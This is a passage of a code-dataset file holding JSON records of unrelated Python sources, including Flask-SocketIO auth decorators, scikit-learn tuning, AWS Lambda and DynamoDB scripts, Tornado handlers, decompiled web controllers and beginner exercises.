\n    For example, in the printout above, the letters e, h, l, p and y each occur twice \n    in the text and they are listed in the output in alphabetical order.\n* Letters that do not occur in the text are not listed in the output at all.\n\"\"\"\nalphabet = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"]\nstrin = input(\"Please enter a string of text (the bigger the better): \")\nprint ('The distribution of characters in \"' + strin + '\" is: ')\nstrin = strin.lower()\nstrlist=list(strin)\nfor j in range(10): # repeated passes, because list.remove() during iteration skips elements\n    for x in strlist:\n        if x not in alphabet:\n            strlist.remove(x)\n    \nstrlen=len(strlist)\nfinal=[]\nfor a in alphabet:\n    letterstrin = \"\"\n    for j in range(10): # counts at most 10 occurrences of each letter\n        if a in strlist:\n            letterstrin = letterstrin + a\n            strlist.remove(a)\n    final.append(letterstrin)\n    \n\nnewfinal = []\nfor a in final:\n    for b in alphabet:\n        if b in a:\n            newfinal.append(a)\n    \nfor b in range(100): # fixed number of bubble-sort passes, ordering longer (more frequent) lines first\n    gofor = 0\n    gofor1 = 1\n    while gofor < (len(newfinal)-1):\n        x = \"\"\n        if len(newfinal[gofor]) < len(newfinal[gofor1]):\n            x = newfinal[gofor]\n            newfinal[gofor] = newfinal[gofor1]\n            newfinal[gofor1] = x\n        gofor = gofor + 1\n        gofor1 = gofor1 + 1\n\nfor i in range(len(newfinal)):\n    print (str(newfinal[i]))\n\n\n","sub_path":"distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"630106999","text":"import functools\nimport inspect\nfrom flask_login import current_user\nfrom flask_socketio import disconnect, emit\nfrom ...services import user, diagram, project_permission\n\n\ndef _get_project_id(**kwargs):\n    try:\n        project_id = None\n        if 'project_id' in kwargs:\n            project_id = int(kwargs['project_id'])\n        else:\n            if 'diagram_id' in kwargs:\n                project_id = diagram.get_diagram(int(kwargs['diagram_id'])).project_id\n            elif 'project_permission_id' in kwargs:\n                project_id = project_permission.get_project_permission(\n                    int(kwargs['project_permission_id'])).project_id\n    except (TypeError, diagram.DiagramDoesNotExist,\n            project_permission.ProjectPermissionDoesNotExist):\n        return None\n    else:\n        return project_id\n\n\ndef self_only(message):\n    def decorator(func):\n        @functools.wraps(func)\n        def wrapper(*args, **kwargs):\n            user_identity = current_user.username\n            if user_identity != args[0]:\n                emit(message, {\n                    'type': 'Failure',\n                    'failure': 'PermissionDenied',\n                    'message': 'Not permission to this user'\n                })\n            return func(*args, **kwargs)\n\n        return wrapper\n\n    return decorator\n\n\ndef check_user_project_permission(message, min_permission):\n    def decorator(func):\n        @functools.wraps(func)\n        def wrapper(*args, **kwargs):\n\n            args_name = list(inspect.signature(func).parameters.keys())\n            project_id = _get_project_id(**{args_name[0]: args[0]})\n\n            if project_id is None:\n                emit(message, {\n                    'type': 'Failure',\n                    'failure': 'ProjectDoesNotExist',\n                    'message': 'project with this id does not exist'\n                })\n                return\n\n            have_permission = user.user_have_permission_for_project(\n                username=current_user.username,\n                project_id=project_id,\n                min_permission=min_permission)\n\n            if not have_permission:\n                emit(message, {\n                    'type': 'Failure',\n                    'failure': 'PermissionDenied',\n                    'message': 'Not permission to this project'\n                })\n            else:\n                return func(*args, **kwargs)\n        return wrapper\n    return decorator\n\n\ndef authenticated_only(func):\n    @functools.wraps(func)\n    def wrapped(*args, **kwargs):\n        if not 
current_user.is_authenticated:\n            disconnect()\n        else:\n            return func(*args, **kwargs)\n    return wrapped\n","sub_path":"abovo/main/utils/event_decorators/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"69679134","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport time\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ndf = np.array(pd.read_pickle('../data/diabetes_train.pickle'))\n\nX = df[:, 0:-1]\nY = df[:, -1]\n\nopt_depth = -1\nopt_n_estimator = -1\nopt_score = -1\ntransformed_X = np.array([])\nconfig = []\n\nfor depth in range(1, 21):\n    dt = DecisionTreeClassifier(max_depth=depth)\n    dt.fit(X, Y)\n\n    model = SelectFromModel(dt, prefit=True)\n    X_new = model.transform(X)\n\n    for n in range(50, 501, 50):\n        print('computing max depth = %d, number of estimators = %d' % (depth, n))\n        clf = RandomForestClassifier(max_depth=depth, n_estimators=n)\n        start = time.clock()\n        result = cross_val_score(clf, X_new, Y, cv=5)\n        end = time.clock()\n        duration = end - start\n        mean_accuracy = np.mean(result)\n\n        config.append({'max_depth': depth, 'n_estimator': n, 'mean_accuracy': mean_accuracy, 'duration': duration})\n\n        if mean_accuracy > opt_score:\n            opt_score = mean_accuracy\n            opt_depth = depth\n            opt_n_estimator = n\n            transformed_X = X_new\n\nprint('%d features are selected.' % transformed_X.shape[1])\nprint('best mean accuracy = %f, max depth = %d, forest size = %d' % (opt_score, opt_depth, opt_n_estimator))\nopt_config = {'max_depth': opt_depth, 'n_estimator': opt_n_estimator, 'transformed_X': transformed_X}\n\npickle.dump(opt_config, open(\"../model/decision_tree_feature_selection_model.pickle\", \"wb\"))\npickle.dump(config, open(\"../model/decision_tree_feature_selection_configs.pickle\", \"wb\"))","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"540095744","text":"from fuzzywuzzy import fuzz\r\nimport json\r\nimport boto3\r\nfrom boto3.dynamodb.conditions import Key, Attr\r\n\r\n# Query the database for a matching lyrics record which has the highest token match ratio with the transcript text\r\ndef lambda_handler(event, context):\r\n    dynamodb_client = boto3.client('dynamodb', region_name=\"us-east-1\")\r\n    dynamodb = boto3.resource('dynamodb')\r\n    #Scan the table to retrieve & loop through the metadata recordset\r\n    table = dynamodb.Table('SongDB')\r\n    results = table.scan()\r\n    totalRec = results['ScannedCount']\r\n    searchString = event['voiceSample']\r\n    returnURL = ''\r\n    lyricsLink = ''\r\n    maxRatio = 0\r\n    for i in range(0,totalRec):\r\n        currentRec = results['Items'][i]\r\n        lyricsText = currentRec['Lyrics']\r\n        currentRatio = fuzz.token_set_ratio(searchString, lyricsText)\r\n        if currentRatio > maxRatio:\r\n            maxRatio = currentRatio\r\n            lyricsLink = currentRec['Storage_URL']\r\n        \r\n    #print(currentRec['Author'])\r\n    #print(currentRatio)\r\n    return {\r\n        'statusCode': 200,\r\n        'SongLink': lyricsLink,\r\n        'MaxRatio': maxRatio\r\n    }\r\n","sub_path":"lambdaFunctions/QueryDB.py","file_name":"QueryDB.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"235080910","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (c) 2010-2014 Elico Corp. All Rights Reserved.\n# Alex Duan \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nfrom openerp.osv import orm, fields\n\n\nclass landed_costs_shipment_po(orm.TransientModel):\n\n _name = 'landed.costs.shipment.po'\n _columns = {\n 'purchase_ids': fields.many2many(\n 'purchase.order', 'landed_cost_shipment_group_rel',\n 'shipment_id', 'po_id',\n 'Purchase Order',\n domain=[('shipment_id', '=', False)]),\n }\n\n def link_po(self, cr, uid, ids, context=None):\n purchase_obj = self.pool.get('purchase.order')\n for assigner in self.browse(cr, uid, ids, context=context):\n po_ids = [po.id for po in assigner.purchase_ids]\n if context and context.get('active_id', False):\n # link the pos to the current shipment\n for po in purchase_obj.browse(cr, uid, po_ids, context=context):\n po.write({'shipment_id': context.get('active_id')})\n \n return {'type': 'ir.actions.act_window_close'}\n\n def confirm(self, cr, uid, ids, context=None):\n shipment_id = context.get('active_id', False)\n","sub_path":"purchase_landed_costs_extended/wizard/shipment_wizard.py","file_name":"shipment_wizard.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"63897603","text":"import gtf_related\nimport trinity_related\nimport plot\n\n\n\ntriDB = trinity_related.TrinityDatabase(\"dgri\")\npsl_lines = triDB.get_psl_lines_by_trinity_trans(\"TRINITY_DN27877_c0_g1_i1\")\nnum_psl_lines = len(psl_lines)\n\n''' initialize plot '''\nfig, (axes) = plot.initializePlot(figureWidth = 30, figureHeight = 10, nrows= (num_psl_lines * 2), ncols=1)\n#fig.suptitle(gene_symbol) #('bold figure suptitle', fontsize=14, fontweight='bold')\n\nindex = 0\n# TRINITY_DN27877_c0_g1_i1\n# TRINITY_DN29060_c3_g1_i1\n# TRINITY_DN29060_c3_g1_i3\n# TRINITY_DN28702_c2_g1_i2\nfor line in psl_lines:\n print(line)\n tpos = []\n (qchrom, lst_blocks, tchrom, lst_tblocks) = trinity_related.get_blocks_for_psl_line(line)\n print(lst_tblocks)\n for tblock in lst_tblocks:\n tpos.append(tblock[0])\n tpos.append(tblock[1])\n plot.anPlot(axes[index], tblock[0], tblock[1], \"+\", \"exon\", 0)\n index += 1\n \n left_boudary = sorted(tpos)[0]\n right_boudnary = sorted(tpos)[-1]\n overlapped_FBgns = gtf_related.get_features_from_chrom_range(\"dgri\",tchrom,left_boudary,right_boudnary)\n print(overlapped_FBgns)\n \n plot.plot_whole_annotation_for_multiple_genes(axes[index], \"dgri\", overlapped_FBgns)\n axes[index-1].set_xlim(axes[index].get_xlim())\n index += 1\n 
\nfig.show()\n","sub_path":"CRoS/visualize.trinity.py","file_name":"visualize.trinity.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488514784","text":"import logging\nimport tornado.web\nimport tornado.gen\nimport traceback\nimport http\nimport os\nimport functools\n\nlogger = logging.getLogger(\"tornado.application\")\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n @tornado.gen.coroutine\n def log_exception(self, exc_type, exc_value, exc_traceback):\n logger.warning(\"Exception %s\" % exc_value)\n if (not isinstance(exc_value, tornado.web.HTTPError)) or (exc_value.status_code >= http.client.INTERNAL_SERVER_ERROR):\n stacktrace = ''.join(traceback.format_tb(exc_traceback))\n logger.error(\"Stacktrace %s\" % stacktrace)\n\n @tornado.gen.coroutine\n def write_error(self, status_code, **kwargs):\n exc_type, exc_value, exc_traceback = kwargs[\"exc_info\"]\n msg = str(exc_value)\n self.write(msg) # return custom error message in the body\n\n def set_default_headers(self):\n pass\n# self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n\n\nclass InfoHandler(BaseHandler):\n SUPPORTED_METHODS = ('GET',)\n\n def get(self):\n \"\"\"Read server parameter\n\n :status 200: ok\n\"\"\"\n data = tornado.options.options.as_dict()\n data['rootpath'] = self.settings['rootpath']\n self.write(data)\n\n\nclass ErrorHandler(BaseHandler):\n \"\"\"Generates an error response with status_code for all requests.\"\"\"\n def initialize(self, status_code):\n self._status_code = status_code\n\n def write_error(self, status_code, **kwargs):\n if status_code == http.client.NOT_FOUND:\n self.write('Oups! Are you lost ?')\n elif status_code == http.client.METHOD_NOT_ALLOWED:\n self.write('Oups! 
RTFM.')\n\n def prepare(self):\n raise tornado.web.HTTPError(self._status_code)\n","sub_path":"video_explorer/handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"491695648","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/tuvedi/admin/layout.py\n# Compiled at: 2011-11-24 10:52:41\nimport sqlalchemy as sa, pypoly, pypoly.session\nfrom pypoly.content.webpage import Webpage\nfrom pypoly.content.webpage import tab, table, message\nfrom pypoly.content.webpage.form import text, Form, button, input\nfrom pypoly.content.webpage import table\nfrom pypoly.content.webpage.form import list as form_list\nfrom pypoly.http import auth\n\nclass LayoutTable(table.Table):\n\n def __init__(self, *args, **kwargs):\n table.Table.__init__(self, *args, **kwargs)\n self.header.append([\n _('Title'),\n _('Template(Class name)'),\n _('Description'),\n table.LabelCell(value=_('Actions'), colspan=2)])\n self.cols.append(table.TextCell())\n self.cols.append(table.TextCell())\n self.cols.append(table.TextCell())\n self.cols.append(table.LinkCell())\n self.cols.append(table.LinkCell())\n\n\nclass CreateLayout(Form):\n\n def __init__(self, *args, **kwargs):\n data = kwargs['_data']\n del kwargs['_data']\n Form.__init__(self, *args, **kwargs)\n self.append(input.TextInput('title', label=_('Title'), required=True))\n self.append(text.Textarea('description', label=_('Description')))\n sel = form_list.DropdownList('template_id', label=_('Template'), required=True)\n for template in data['templates']:\n sel_list = form_list.ListGroup(None, label=template['title'])\n for layout in template['layouts']:\n sel_list.append(form_list.ListItem(None, label=layout['title'], value='%d_%s' % (\n template['id'],\n layout['name'])))\n\n sel.append(sel_list)\n\n self.append(sel)\n self.add_button(button.SubmitButton('submit', label=_('Create')))\n return\n\n\nclass DeleteLayout(Form):\n\n def __init__(self, *args, **kwargs):\n data = kwargs['_data']\n del kwargs['_data']\n Form.__init__(self, *args, **kwargs)\n self.append(input.TextInput('title', label=_('Title'), readonly=True, value=data['title']))\n self.append(text.Textarea('description', label=_('Description'), readonly=True, value=data['description']))\n self.add_button(button.SubmitButton('yes', label=_('Yes, delete it')))\n self.add_button(button.SubmitButton('no', label=_(\"NO, don't delete it\")))\n\n\nclass EditLayout(Form):\n\n def __init__(self, *args, **kwargs):\n data = kwargs['_data']\n del kwargs['_data']\n Form.__init__(self, *args, **kwargs)\n self.append(input.TextInput('title', label=_('Title'), required=True, value=data['title']))\n self.append(text.Textarea('description', label=_('Description'), value=data['description']))\n self.add_button(button.SubmitButton('save', label=_('Save')))\n self.add_button(button.SubmitButton('cancel', label=_('Cancel')))\n\n\nclass Controller(object):\n _pypoly_config = {'session.mode': pypoly.session.MODE_READONLY}\n\n @pypoly.http.expose(auth=auth.any(auth.group('tuvedi.user'), auth.group('tuvedi.admin')))\n def index(self, **values):\n db_conn = pypoly.tool.db_sa.connect()\n db_template = pypoly.tool.db_sa.meta.tables['template']\n db_layout = pypoly.tool.db_sa.meta.tables['layout']\n db_sel = sa.sql.select([\n db_template.c.id,\n 
db_template.c.title])\n db_res = db_conn.execute(db_sel)\n templates = []\n for row in db_res:\n templates.append(dict(id=row[db_template.c.id], name=row[db_template.c.title]))\n\n data = dict(templates=pypoly.tool.tuvedi.get_templates_with_layouts())\n form = CreateLayout('layout', method='POST', title=_('Create layout'), action=pypoly.url(action='index', scheme='layout'), _data=data)\n form.prepare(values)\n if form.is_submit() and form.validate():\n tmp = form.get_value('template_id').split('_', 1)\n template_id = int(tmp[0])\n layout_name = tmp[1]\n db_ins = db_layout.insert().values(title=form.get_value('title'), description=form.get_value('description'), template_id=template_id, class_name=layout_name)\n db_conn.execute(db_ins)\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'created'}, scheme='layout'))\n page = Webpage()\n if 'status' in values:\n if values['status'] == 'created':\n page.append(message.Success(text=_('Layout successfully created.')))\n if values['status'] == 'delete-canceled':\n page.append(message.Info(text=_('Deletion canceled.')))\n if values['status'] == 'delete-failed':\n page.append(message.Error(text=_('Something went wrong while deleting the Layout.')))\n if values['status'] == 'delete-success':\n page.append(message.Success(text=_('Layout successfully deleted.')))\n if values['status'] == 'edit-canceled':\n page.append(message.Info(text=_('Editing canceled and changes not saved.')))\n if values['status'] == 'edit-failed':\n page.append(message.Error(text=_('Something went wrong while saving the layout.')))\n if values['status'] == 'edit-success':\n page.append(message.Success(text=_('Settings are successfully saved.')))\n layout_tabs = tab.DynamicTabs('tabs-layout', title=_('Manage Layouts'))\n layout_tab = tab.TabItem('tab-list', title=_('Layouts'))\n layout_table = LayoutTable()\n db_sel = sa.sql.select([\n db_layout.c.id,\n db_layout.c.title,\n db_layout.c.description,\n db_layout.c.class_name,\n sa.sql.expression.label('tpl_title', db_template.c.title)], db_layout.c.template_id == db_template.c.id)\n db_res = db_conn.execute(db_sel)\n table_empty = True\n for row in db_res:\n table_empty = False\n layout_title = row[db_layout.c.title]\n if layout_title == None:\n layout_title = ''\n layout_description = row[db_layout.c.description]\n if layout_description == None:\n layout_description = ''\n layout_class_name = row[db_layout.c.class_name]\n if layout_class_name == None:\n layout_class_name = ''\n template_title = row[db_template.c.title]\n if template_title == None:\n template_title = ''\n layout_table.append([\n layout_title,\n '%s (%s)' % (\n template_title,\n layout_class_name),\n layout_description,\n table.LinkCell(value=_('Edit'), url=pypoly.url(action='edit', values={'id': row[db_layout.c.id]}, scheme='layout')),\n table.LinkCell(value=_('Delete'), url=pypoly.url(action='delete', values={'id': row[db_layout.c.id]}, scheme='layout'))])\n\n if table_empty == True:\n layout_table.append([\n table.TextCell(colspan=5, value=_('No layouts found.'))])\n layout_tab.append(layout_table)\n layout_tabs.append(layout_tab)\n form_tab = tab.TabItem('tab-create', title=_('Create'))\n form_tab.append(form)\n layout_tabs.append(form_tab)\n page.append(layout_tabs)\n return page\n\n @pypoly.http.expose(routes=[\n dict(action='delete', path='delete/{id}', requirements={'id': '\\\\d+'}, types={'id': int})], auth=auth.any(auth.group('tuvedi.user'), auth.group('tuvedi.admin')))\n def delete(self, **values):\n layout_id = 
values['id']\n db_conn = pypoly.tool.db_sa.connect()\n db_layout = pypoly.tool.db_sa.meta.tables['layout']\n db_sel = sa.sql.select([\n db_layout.c.id,\n db_layout.c.title,\n db_layout.c.description], db_layout.c.id == layout_id)\n db_res = db_conn.execute(db_sel)\n db_data = db_res.fetchone()\n data = dict()\n data['title'] = db_data[db_layout.c.title]\n if db_data[db_layout.c.description] == None:\n data['description'] = ''\n else:\n data['description'] = db_data[db_layout.c.description]\n form = DeleteLayout('layout', method='POST', title=_('Delete Layout'), action=pypoly.url(action='delete', values={'id': layout_id}, scheme='layout'), _data=data)\n form.prepare(values)\n if form.is_submit() and form.validate():\n if form.is_clicked('yes'):\n db_delete = sa.sql.expression.delete(db_layout, db_layout.c.id == layout_id)\n db_res = db_conn.execute(db_delete)\n if db_res.rowcount > 0:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'delete-success'}, scheme='layout'))\n else:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'delete-failed'}, scheme='layout'))\n else:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'delete-canceled'}, scheme='layout'))\n page = Webpage()\n page.append(form)\n return page\n\n @pypoly.http.expose(routes=[\n dict(action='edit', path='edit/{id}', requirements={'id': '\\\\d+'}, types={'id': int})], auth=auth.any(auth.group('tuvedi.user'), auth.group('tuvedi.admin')))\n def edit(self, **values):\n layout_id = values['id']\n db_conn = pypoly.tool.db_sa.connect()\n db_layout = pypoly.tool.db_sa.meta.tables['layout']\n db_sel = sa.sql.select([\n db_layout.c.id,\n db_layout.c.title,\n db_layout.c.description], db_layout.c.id == layout_id)\n db_res = db_conn.execute(db_sel)\n db_data = db_res.fetchone()\n data = dict()\n data['title'] = db_data[db_layout.c.title]\n if db_data[db_layout.c.description] == None:\n data['description'] = ''\n else:\n data['description'] = db_data[db_layout.c.description]\n form = EditLayout('layout-edit', method='POST', title=_('Edit Layout'), action=pypoly.url(action='edit', values={'id': layout_id}, scheme='layout'), _data=data)\n form.prepare(values)\n if form.is_submit() and form.validate():\n if form.is_clicked('save'):\n db_update = db_layout.update().where(db_layout.c.id == layout_id).values(title=form.get_value('title'), description=form.get_value('description'))\n db_res = db_conn.execute(db_update)\n if db_res.rowcount > 0:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'edit-success'}, scheme='layout'))\n else:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'edit-failed'}, scheme='layout'))\n else:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'edit-canceled'}, scheme='layout'))\n page = Webpage()\n page.append(form)\n return page","sub_path":"pycfiles/tuvedi-0.3-py2.6/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":11216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"85207916","text":"#kelly jaramillo, 8-11-2020 fcc python class learnTogether Week 2 code, step 2\n\n#take 2 inputs from user, a starting & ending value (integer) \nprint(\"Please enter a starting value \")\nstarting_val_str = input()\nstarting_val_int = int(starting_val_str) #lets convert our str to int\n\nprint(\"Please Enter a ending value \")\nending_val_str = 
input()\nending_val_int = int(ending_val_str) #lets convert our str to int\nprint( \" ------------------------------- \")\n\n#the values can't equal each other, and the starting should be smaller\nif (starting_val_int >=ending_val_int):\n    print(\"your starting value is larger or equal to your ending value. Nothing else will happen\")\nelse:\n    print(\"the prime numbers from your inputs are...\")\n    #we are adding a +1 here so that we will get the last number. could have done this with a while or do while loop\n    for x in range(starting_val_int,ending_val_int+1):\n        #a prime number is any number that is evenly divided by itself and 1 only. so for\n        #example, 5 is prime since you get no remainder after you divide. but 6 is not prime\n        #since we can divide it evenly with 1, 2, 3, and 6.\n        #to do this, we will skip over checking if x is in [1,2,3,5,7], since we know all these are \n        #prime. after 7, we will mod by 2, 3, 5 and 7. (note: this misses composites like 121 whose smallest factor is greater than 7) \n        \n        isPrime = True\n        if (x not in [1,2,3,5,7]):\n            isPrime = (x % 2)!=0 and (x % 3)!=0 and (x % 5)!=0 and (x % 7)!=0\n        \n        if (isPrime):\n            print(str(x)+\" is a prime number\")\n        \n","sub_path":"w2/prime_io.py","file_name":"prime_io.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"386572599","text":"#!/bin/python3\nimport RPi.GPIO as GPIO\nimport subprocess\n\nGPIO.setwarnings (False)\nGPIO.setmode (GPIO.BCM)\nGPIO.setup (16, GPIO.OUT)\nGPIO.setup (12, GPIO.OUT)\n\n\n\nexit_code=subprocess.call('ping -c 4 www.google.com'.split())\nif exit_code == 0:\n    GPIO.output(16, True)\n    GPIO.output(12, False)\nelse:\n    GPIO.output(16, False)\n    GPIO.output(12, True)\n","sub_path":"check_Internet.py","file_name":"check_Internet.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"426988274","text":"import pandas\ndef firstName( s ):\n#    if ((s.find(\"Col.\")>-1) or(s.find(\"Mr.\")>-1) or (s.find(\"Miss.\")>-1)):\n    if ((s.find(\"Mrs.\")==-1) and (s.find(\"Lady.\")==-1)): # 'and': only use the parenthesised given name for Mrs./Lady entries\n        b = s.find(\".\")+2\n        e = s.find(\" \", b)+1\n    else:\n        b = s.find(\"(\")+1\n        e = s.find(\" \", b)+1\n    return s[b:e]\ndef sex(s):\n    if (s.find(\"Mr.\")>-1):\n        return \"male\"\n    else:\n        return \"female\"\ndata = pandas.read_csv('titanic.csv', index_col='PassengerId')\nprint( \"Sex\\n\", data['Sex'].value_counts() )\nprint( \"Survived\\n\", data['Survived'].value_counts(1) )\nprint( \"Pclass\\n\", data['Pclass'].value_counts(1) )\nprint( \"Age\\n\", data['Age'].mean() )\nprint( \"Age\\n\", data['Age'].median() )\nprint( \"Age\\n\", data.corr() )\ndata[\"FirstName\"] = data['Name'].apply(firstName)\nprint( \"FirstNameMale\\n\", data['FirstName'][data['Sex'] == \"male\"].value_counts() )\nprint( \"FirstNameFemale\\n\", data['FirstName'][data['Sex'] == \"female\"].value_counts() )\n","sub_path":"Coursera/w1l1/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"484399980","text":"import boto3\n\n\ndynamodb = boto3.resource(\"dynamodb\", region_name='ap-northeast-1')\nlist(dynamodb.tables.all())\n\n#table = dynamodb.Table('Daily_Scraping')\ntable = dynamodb.create_table(\nTableName = 'Daily_scraping',\n    KeySchema = [\n        {\n            'AttributeName' : 'ID',\n            'KeyType' : 'HASH'\n        },\n        {\n            'AttributeName' : 'location',\n            'KeyType' : 'RANGE'\n        }\n    ],\n    AttributeDefinitions =[\n        {\n            'AttributeName' : 'id',\n            'AttributeType' : 'S'\n        
},\n {\n 'AttributeName' : 'location',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'cateory',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'url',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'rank',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'date',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'restaurant_name',\n 'AttributeType' : 'S'\n },\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits':1,\n 'WriteCapacityUnits':1\n }\n)\n\n\n'''\nfrom logging import exception\nfrom selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom time import sleep\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.chrome.options import Options\nimport pandas as pd\nfrom selenium.webdriver.common.keys import Keys\nimport csv\n\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\n\ndf = pd.read_csv('tokyo.csv', encoding=\"shift_jis\")\nlocation_list = df['town']\n\nbrowser = webdriver.Chrome(executable_path='/home/gm116/bin/chromedriver',options=chrome_options)\nurl = 'https://www.ubereats.com/jp/feed?mod=deliveryDetails&pl=JTdCJTIyYWRkcmVzcyUyMiUzQSUyMiVFNiVCOCU4QiVFOCVCMCVCNyVFNSU4QyVCQSUyMiUyQyUyMnJlZmVyZW5jZSUyMiUzQSUyMkNoSUowUWd4NjdLTUdHQVJkMlpiT2JMWkhQRSUyMiUyQyUyMnJlZmVyZW5jZVR5cGUlMjIlM0ElMjJnb29nbGVfcGxhY2VzJTIyJTJDJTIybGF0aXR1ZGUlMjIlM0EzNS42NjE5NzA3JTJDJTIybG9uZ2l0dWRlJTIyJTNBMTM5LjcwMzc5NSU3RA%3D%3D&ps=1'\n\nfor Location in location_list:\n \n try:\n browser.get(url)\n change_element = browser.find_element_by_xpath('//*[@id=\"wrapper\"]/div[4]/div/div/div[2]/div[3]/div/div[2]/div[1]/div[2]/a')\n change_element.click() #配送先クリック//*[@id=\"wrapper\"]/div[5]/div/div/div[2]/div[3]/div/div[2]/div[1]/div[2]/a\n except NoSuchElementException:\n change_element_1 = browser.find_element_by_xpath('//*[@id=\"wrapper\"]/div[5]/div/div/div[2]/div[3]/div/div[2]/div[1]/div[2]/a')\n change_element_1.click() \n \n sleep(1)\n location_element = browser.find_element_by_xpath('//*[@id=\"location-typeahead-location-manager-input\"]')\n location_element.send_keys(Location) #//*[@id=\"location-typeahead-location-manager-input\"]\n sleep(1)\n location_element.send_keys(Keys.ENTER)\n sleep(1)\n table.put_item(\n Item= {\n 'location' : Location,\n 'url':browser.current_url\n }\n )\n'''\n\n\n\n\n\n","sub_path":"dynamodb.py","file_name":"dynamodb.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191583433","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/jennyq/.pyenv/versions/venv_t12/lib/python3.7/site-packages/tendenci/apps/memberships/migrations/0003_auto_20160217_1217.py\n# Compiled at: 2020-03-30 17:48:04\n# Size of source mod 2**32: 409 bytes\nfrom django.db import migrations, models\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('memberships', '0002_auto_20150804_1545')]\n operations = [\n migrations.AlterField(model_name='membershiptype',\n name='admin_only',\n field=models.BooleanField(default=False, verbose_name='Admin Only'))]","sub_path":"pycfiles/tendenci-12.0.5-py3-none-any/0003_auto_20160217_1217.cpython-37.py","file_name":"0003_auto_20160217_1217.cpython-37.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"140764845","text":"def bisection():\n\tprint(\"Please 
